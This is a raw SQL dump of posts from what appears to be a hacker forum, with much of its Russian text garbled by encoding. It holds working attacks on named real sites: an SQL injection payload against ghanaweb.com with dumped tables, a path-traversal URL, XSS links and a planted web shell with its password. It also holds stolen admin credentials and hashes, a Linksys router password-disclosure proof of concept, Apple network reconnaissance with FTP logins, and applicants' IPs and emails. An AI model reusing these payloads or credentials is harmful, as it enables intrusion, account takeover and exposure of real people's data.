: : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.virustotal.com/en/user/Linkcabin/ | https://www.virustotal.com/en/user/Linkcabin/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1910, 1612, 1833, 'unlog', 45, '', 1409852899, 'ýõòõрþÑÂтýþ ýþ фðúт: ýð 9000 ÿþрту ðÿðч ñõ÷ þóрðýøчõýøù ò ÿðÿúõ uploads :)\n_http://88.208.61.116:9000/upload/uploads/wso2.php\npassword = root\n\nÕщõ þôýð ÿþхþöðѠñðóð, ýþ уöõ ñõ÷ ûøÑÂтøýóð ôøрõúтþрøù (ôруóðѠþÑÂ?):\n_http://gdrive.pro/upload/\nphp ýð ÑÂтþт рð÷ тþчýþ üþöýþ ýõ ÷ðûøòðть:) ÑÂüþтрøтõ úþýфøó ýøöõ.\n\nÚþýфøó nginx:\n_http://gdrive.pro/upload/download.php?file=../../../../../../usr/local/etc/nginx/include/gdrive.conf\n\nßþöðûуùÑÂтð, ýõ òрõôøтõ ÑÂõрòõру ýð úþтþрþü шõû, тþ õÑÂть ôõфõùÑÂøть, уôðÃȄÂть чтþ-тþ ðôüøýÑÂúþõ ýõ ÑÂтþøт. áÿðÑÂøñþ.', 1, 0, '', 0, 1, 0, 0, 0),
(1911, 1644, 0, 'Invite', 2, '{$name}', 1409865048, '[SIZE=\'4\'][COLOR=\'Sienna\']silent9[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: silent.9@outlook.com\n[b]e-mail[/b]: silent.9@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.180.11.247\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://silent9.deviantart.com | silent9.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1912, 1645, 0, 'kx00', 6, 'ghanaweb.com', 1409909840, '_ttp://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=-24121\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+\r\n\r\nalexa: 2.4ú ~200ú уýøúþò/ôõýь.\r\n50% трðффð USA.\r\n\r\nßутø: \r\nerror_log(/usr/www/users/rijk/logs/errorlog.html) \r\n/usr/www/users/rijk/ghanaweb/utils/error.php\r\n/usr/www/users/rijk/ghanaweb/\r\n\r\n[CODE]+-------------------------------+\r\n| BlackStars_Matches |\r\n| CLASSIFIED |\r\n| CLASSIFIED2 |\r\n| CLASSIFIED_COUNTRY |\r\n| CMS_PAGE |\r\n| GHANA2008 |\r\n| HOTEL |\r\n| JOKES |\r\n| MOVIE |\r\n| MOVIE_SURVEY |\r\n| PAGE_CACHE |\r\n| PAGE_CACHE2 |\r\n| PLAYERMATCH_RATING |\r\n| RADIO_STATION |\r\n| SAVED_EMAILS |\r\n| SPONSOR_SITE |\r\n| SPONSOR_SITE_VIEW |\r\n| STICKY_CLASSIFIED |\r\n| WORLD66 |\r\n| #mysql50#SP:ONSOR_SITE |\r\n| ts\\\\gsq_18525 |\r\n| ab_auth_user |\r\n| ab_records |\r\n| address_AdditionalData |\r\n| address_Address |\r\n| address_Contact |\r\n| address_Counter |\r\n| address_Country |\r\n| address_Email |\r\n| address_GroupList |\r\n| address_Groups |\r\n| address_Messaging |\r\n| address_Options |\r\n| address_OtherPhone |\r\n| address_Scratchpad |\r\n| address_Users * |\r\n| address_Websites |\r\n| answers |\r\n| bhfmagazine |\r\n| buteurs |\r\n| buts |\r\n| championnats |\r\n| clmnt |\r\n| clubs |\r\n| contact |\r\n| dictee |\r\n| dictee_resultaat |\r\n| dictee_resultaat_summary |\r\n| dictee_vraag |\r\n| divisions |\r\n| equipes |\r\n| faq_admins |\r\n| faq_banlist |\r\n| faq_bindata |\r\n| faq_category |\r\n| faq_category_admins |\r\n| faq_category_ref |\r\n| faq_comments |\r\n| faq_data |\r\n| faq_failed_logins |\r\n| faq_failed_notify |\r\n| faq_faq_keywords |\r\n| faq_faq_ref |\r\n| faq_freemailer |\r\n| faq_hostcache |\r\n| faq_iplog |\r\n| faq_kb_articles |\r\n| faq_kb_cat |\r\n| faq_kb_keywords |\r\n| faq_kb_os |\r\n| faq_kb_subcat |\r\n| faq_keywords |\r\n| faq_layout |\r\n| faq_misc |\r\n| faq_os |\r\n| faq_prog_os |\r\n| faq_programm |\r\n| faq_programm_admins |\r\n| faq_programm_version |\r\n| faq_questions |\r\n| faq_related_categories |\r\n| faq_related_faq |\r\n| faq_related_subcat |\r\n| faq_session |\r\n| faq_subcategory |\r\n| faq_texts |\r\n| fun_drlove |\r\n| geo_contacts |\r\n| joueurs |\r\n| journees |\r\n| matchs |\r\n| mysearch |\r\n| mysearch_scheduler |\r\n| mysearch_synonyms |\r\n| mysearch_work |\r\n| nigeriafilms |\r\n| old_players |\r\n| parametres |\r\n| people |\r\n| people2 |\r\n| photos |\r\n| phpCalendar_AdminSessions |\r\n| phpCalendar_AdminUsers |\r\n| phpCalendar_Config |\r\n| phpCalendar_Daily |\r\n| phpCalendar_Details |\r\n| phpCalendar_EventLocations |\r\n| phpCalendar_Locations |\r\n| phpCalendar_Monthly |\r\n| phpCalendar_PeriodicalMonthly |\r\n| phpCalendar_PeriodicalYearly |\r\n| phpCalendar_Weekly |\r\n| phpCalendar_Yearly |\r\n| pladdresslog |\r\n| players |\r\n| plcomps |\r\n| plconfigdata |\r\n| plgroups |\r\n| plgroupstandings |\r\n| pllids |\r\n| plmatchdata |\r\n| plmonthlywinner |\r\n| plmsgdata |\r\n| plppalpay |\r\n| plpredictiondata |\r\n| plprivleague |\r\n| plprivmembers |\r\n| plshout |\r\n| plstandings |\r\n| pluserdata |\r\n| pluserlids |\r\n| poll_comment |\r\n| poll_config |\r\n| poll_data |\r\n| poll_index |\r\n| poll_ip |\r\n| poll_log |\r\n| poll_templates |\r\n| poll_templateset |\r\n| poll_user |\r\n| questions |\r\n| saisons |\r\n| sections |\r\n| soccer_players |\r\n| tapis_vert |\r\n| test |\r\n| ts_answers |\r\n| ts_blackboard |\r\n| ts_categories |\r\n| ts_game_cats |\r\n| ts_game_question_cache_1 |\r\n| ts_game_sections |\r\n| ts_game_sessions |\r\n| ts_games |\r\n| ts_gsq_185 |\r\n| ts_gsq_18516 |\r\n| ts_gsq_18517 |\r\n| ts_gsq_18524 |\r\n| ts_gsq_18535 |\r\n| ts_gsq_18541 |\r\n| ts_option_groups |\r\n| ts_options |\r\n| ts_questions |\r\n| ts_template_cache |\r\n| ts_template_vars |\r\n| ts_templates |\r\n| ts_users |\r\n| type |\r\n+-------------------------------+[/CODE]\r\n\r\nÕÑÂть ÑÂúþñы ðôüøýúð \r\n_ttp://www.ghanaweb.com/GhanaHomePage/faq/admin/\r\n\r\n[CODE]tp_contents:DTymFWkh\r\nwmaster:nomorefufu (ÑÂÿðÑÂøñþ Kingbeef)[/CODE]\r\nÃÂþ тðü úðúøõ тþ трðñûы Ѡúþýýõúтþü. \r\n\r\n×òõрõù üðûþ. ~4ú. øýтõрõÑÂõý шõûû.', 1, 1, '', 0, 1, 0, 0, 0),
(1913, 1645, 1912, 'kx00', 6, '', 1409909992, 'ð ôð xss) \n_ttp://www.ghanaweb.com/GhanaHomePage/education/browse2.php?begin=O', 1, 1, '', 0, 1, 0, 0, 0),
(1914, 1645, 1912, 'null', 9, '', 1409916713, 'hppp://www.ghanaweb.com/GhanaHomePage/games/admin/index.php\n\ndevel 1234\náтрðýýþ òÑÂõ ÑÂтþ òõ÷ôõ þшøñúø', 1, 0, '', 0, 1, 0, 0, 0),
(1915, 1645, 1912, 'null', 9, '', 1409917080, 'hxxp://www.ghanaweb.com/law_cms/cm/edit.article.php', 1, 0, '', 0, 1, 0, 0, 0),
(1916, 1646, 0, 'Invite', 2, '{$name}', 1409932765, '[SIZE=\'4\'][COLOR=\'Sienna\']orphdx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1337\n[b]e-mail[/b]: orphdx@yahoo.com\n[b]Info[/b]: I am member of another forum, \r\n\r\nthis is my profile, check it \r\n\r\nhttps://rstforums.com/forum/members/fi8svrs/\r\n\r\nand you will see there my skills\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.13.93.43\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : orphdx : orphdx@yahoo.com : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : orphdx@yahoo.com : orphdx : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://eu.battle.net/d3/ru/profile/Hyperion-2514/.../27126770 | http://eu.battle.net/d3/ru/profile/Hyperion-2514/.../27126770 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1917, 1647, 0, 'Invite', 2, '{$name}', 1409932784, '[SIZE=\'4\'][COLOR=\'Sienna\']orphdx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1337\n[b]e-mail[/b]: orphdx@yahoo.com\n[b]Info[/b]: I am member of another forum, \r\n\r\nthis is my profile, check it \r\n\r\nhttps://rstforums.com/forum/members/fi8svrs/\r\n\r\nand you will see there my skills\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.13.93.43\n[*][b]real ip[/b]: 5.13.93.43\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : orphdx : orphdx@yahoo.com : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : orphdx@yahoo.com : orphdx : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.4b42.com/US-de/user/profile.html?id=18479 | http://www.4b42.com/US-de/user/profile.html?id=18479 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1918, 1645, 1912, 'unlog', 45, '', 1409933824, 'WordPress 3.5.1\n_http://ehjuma.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/ehjuma/\n_http://bibini.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/bibini4gh/\n_http://ok.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/okyeamekwame/\n\nõщõ ñõùÑÂøú:\n_http://ghanaweb.com/members/\n_http://ghanaweb.com/cms/\n_http://ghanaweb.com/convert/\n\nýð _http://discussions.ghanaweb.com/ õÑÂть ðôüøý wmaster,\nýðòõрýþ øüõõт ÑÂüыÑÂû ÿþøÑÂúðть ò ñð÷õ õщõ ÿðрþûø', 1, 0, '', 0, 1, 0, 0, 0),
(1919, 1648, 0, 'w0rm', 1, 'Linksys Smart Wi-Fi Router EA6500', 1409938637, '# Wi-Fi Router EA3500\n[code]\n\n Linksys Smart Wi-Fi Router EA3500 / EA6500 VulnerabilitiesProduct: Linksys Smart Wi-Fi Router EA6500 \nFirmware: Version 1.1.29 (Build 162351) \n\nProduct: Linksys Smart Wi-Fi Router EA3500 \nFirmware: Version 1.1.39.145204 \n\nVulnerability type: Router password and system private information disclosure! \nSeverity: High (Critical) \n\nDetails: The vulnerability allows an attacker to read system private information, and get MD5(unix) encrypted administrator password, remotely. \n\nExploitation-Technique (POC): \nTarget: [URL]http://72.8.255.7/ui/dynamic/login.html[/URL] \n\n#Password disclosure \n$ wget [URL]http://72.8.255.7/.htpasswd[/URL] > password \n$ cat password \nadmin:$1$HrEMQi7U$/Ci6nHHLzVfMcwCk2mc23/ ( decrypted password: stefani1) \n\n#using brute force tools like hash cat, its possible to decrypt the password \n\n#System disclosure \n$ wget [URL]http://72.8.255.7/sysinfo.cgi[/URL] > system_information \n$ cat system_information \n\nCode:Vendor: LINKSYS \nModelName: EA3500 \n\nFirmware Version: 1.1.39.145204 \n\nFirmware Builddate: 2012-11-14 10:57 \nProduct.type: production \nLinux: Linux version 2.6.35.8 (root@hudson-node) (gcc version 4.2.0 20070413 (prerelease) (CodeSourcery Sourcery G++ Lite 2007q1-21)) #1 Wed Nov 14 02:31:16 PST 2012 \n\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(1920, 1649, 0, 'Invite', 2, '{$name}', 1409939218, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Email@s.com\n[b]e-mail[/b]: Email@s.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.246\n[*][b]real ip[/b]: 46.165.222.246\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1925, 1651, 0, 'Invite', 2, '{$name}', 1409940382, '[SIZE=\'4\'][COLOR=\'Sienna\']joao[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: -\n[b]e-mail[/b]: archivaldogm@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 181.31.176.6\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/minderico | https://twitter.com/minderico \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1936, 1655, 0, 'Invite', 2, '{$name}', 1410007333, '[SIZE=\'4\'][COLOR=\'Sienna\']alexalex[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: stru4xxt@exploit.im\n[b]e-mail[/b]: albert.petrov86@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.213.159.200\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : alexalex : alexdiestonight@safe-mail.net : : d6b56ef0c922e1b16ff81c833376fb77\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://alexalex.ru | alexalex.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1933, 1653, 0, 'Invite', 2, '{$name}', 1409954202, '[SIZE=\'4\'][COLOR=\'Sienna\']entr0py[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: entr0py@jabber.ru\n[b]e-mail[/b]: fake.guy@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.19.248.162\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/entr0pyteam | http://vk.com/entr0pyteam \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1934, 1654, 0, 'Invite', 2, '{$name}', 1409955345, '[SIZE=\'4\'][COLOR=\'Sienna\']mrkavka[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: nativ@exploit.im\n[b]e-mail[/b]: mrkavka@openmailbox.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.148.163.38\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://discussion.evernote.com/user/92606-mrkafka/ | https://discussion.evernote.com/user/92606-mrkafka/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1935, 1648, 1919, 'l3n0', 44, '', 1409983133, 'this is found by my friend [email]stdcall@jodo.im[/email]', 1, 0, '', 0, 1, 0, 0, 0),
(1937, 1645, 1912, '123', 41, '', 1410009498, '[url]http://www.ghanaweb.com/GhanaHomePage/faq/admin/[/url]\ntp_contents:DTymFWkh\nwmaster:nomorefufu\n\n\n\nõщõ ðôüøýы\nadmin:934161ec95c5ed977ec88f1d0d40d1a6\nwmaster:cdce435ccea070a1a8dc218799d2e1a9\nAdmin:2628ds\ndevel:1234', 1, 0, '', 0, 1, 0, 0, 0),
(1938, 1656, 0, 'Invite', 2, '{$name}', 1410010209, '[SIZE=\'4\'][COLOR=\'Sienna\']Malwin[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: malwinjabber@xmpp.jp\n[b]e-mail[/b]: malwinmail@gmail.com\n[b]Info[/b]: * Reverse engineering\r\n* Malware research\r\n* Cross Platform programming\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.85.161.2\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://malwin.com | malwin.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0);
INSERT INTO `post` (`postid`, `threadid`, `parentid`, `username`, `userid`, `title`, `dateline`, `pagetext`, `allowsmilie`, `showsignature`, `ipaddress`, `iconid`, `visible`, `attach`, `infraction`, `reportthreadid`) VALUES
(1942, 1658, 0, 'w0rm', 1, '*.apple.', 1410023769, '_ttps://trainingadmin.apple.com/root/\n_ttps://trainingadmin.apple.com/root/status\nJBoss.\n_ttp://www.securitylab.ru/analytics/413450.php\n\n\n[URL]ftp://17.151.38.84[/URL]\n\nproappcustomer:media\n\n\n\nmx list [url]http://mxlist.net/mail-in6.apple.com/21[/url]\n\n[code]\n \n[LIST=1]\n[*]17.72.4.1 vl111.ie-dmz-sw1.euro.apple.com\n17.72.4.2 vl111.ie-dmz-sw2.euro.apple.com\n17.72.4.11 v05.ie-dmz-sw1.euro.apple.com\n17.72.4.12 v05.ie-dmz-sw2.euro.apple.com\n17.72.5.1 vl110.ie-dmz-sw1.euro.apple.com\n17.72.5.2 vl110.ie-dmz-sw2.euro.apple.com\n17.72.5.10 vl1102.ie-choke-gw1.euro.apple.com\n17.72.5.11 v05.rtr1a-eu.euro.apple.com\n17.72.5.12 v05.rtr1b-eu.euro.apple.com\n17.72.5.13 v05.rtr2a-eu.euro.apple.com\n17.72.5.14 v05.rtr2b-eu.euro.apple.com\n17.72.6.5 vl701.ie-choke-gw1.euro.apple.com\n17.72.6.6 vl701.ie-choke-gw2.euro.apple.com\n17.72.128.2 v128.ie-dmz-sw1.euro.apple.com\n17.72.128.51 ieork1-asavpn-fw1.euro.apple.com\n17.72.128.52 crk-asa-vpn.euro.apple.com\n17.72.129.33 xvpn1.euro.apple.com\n17.72.129.34 xvpn2.euro.apple.com\n17.72.129.36 cvpn.euro.apple.com\n17.72.129.37 svpn-u.euro.apple.com\n17.72.129.41 vpn.euro.apple.com\n17.72.129.42 vpn.euro.apple.com\n17.72.129.44 vpn-saci.euro.apple.com\n17.72.129.45 crk-saci-vpn.euro.apple.com\n17.72.132.2 v132.ie-dmz-sw1.euro.apple.com\n17.72.132.3 v132.ie-dmz-sw2.euro.apple.com\n17.72.132.21 v132r.ie-dmz-lb.euro.apple.com\n17.72.132.22 v251r1.ie-dmz-lb1.euro.apple.com\n17.72.132.23 v251r2.ie-dmz-lb2.euro.apple.com\n17.72.133.64 nserver.euro.apple.com\n17.72.133.101 nserver-ib1.euro.apple.com\n17.72.133.102 nserver-ib1-ha.euro.apple.com\n17.72.133.103 nserver-ib2.euro.apple.com\n17.72.133.104 nserver-ib2-ha.euro.apple.com\n17.72.134.75 vahalla.emagic.de\n17.72.136.2 v136.ie-dmz-sw1.euro.apple.com\n17.72.136.3 v136.ie-dmz-sw2.euro.apple.com\n17.72.140.2 v140.ie-dmz-sw1.euro.apple.com\n17.72.140.3 v140.ie-dmz-sw2.euro.apple.com\n17.72.144.34 avpn4-t.euro.apple.com\n17.72.144.35 avpn5-t.euro.apple.com\n17.72.144.54 lom-avpn4-t.euro.apple.com\n17.72.144.55 lom-avpn5-t.euro.apple.com\n17.72.251.21 v251v.ie-dmz-lb.euro.apple.com\n17.72.251.22 v251v1.ie-dmz-lb1.euro.apple.com\n17.72.251.23 v251v2.ie-dmz-lb2.euro.apple.com\n17.72.251.38 mail-in-vip.euro.apple.com\n17.72.251.39 mail-out-vip.euro.apple.com\n17.72.255.2 vl123.ie-dmz-sw1.euro.apple.com\n17.72.255.3 vl123.ie-dmz-sw2.euro.apple.com\n17.77.141.67 esltnb1.nlven.euro.apple.com\n17.77.141.68 eslti1.nlven.euro.apple.com\n17.77.141.139 eslmdc1.nlven.euro.apple.com\n17.77.141.140 eslmdc2.nlven.euro.apple.com\n17.77.141.141 eslpnb1.nlven.euro.apple.com\n17.77.141.142 eslpnb2.nlven.euro.apple.com\n17.77.141.143 eslpi1.nlven.euro.apple.com\n17.77.141.144 eslpi2.nlven.euro.apple.com\n17.77.141.145 eslpi3.nlven.euro.apple.com\n17.77.141.146 eslpi4.nlven.euro.apple.com\n17.77.141.147 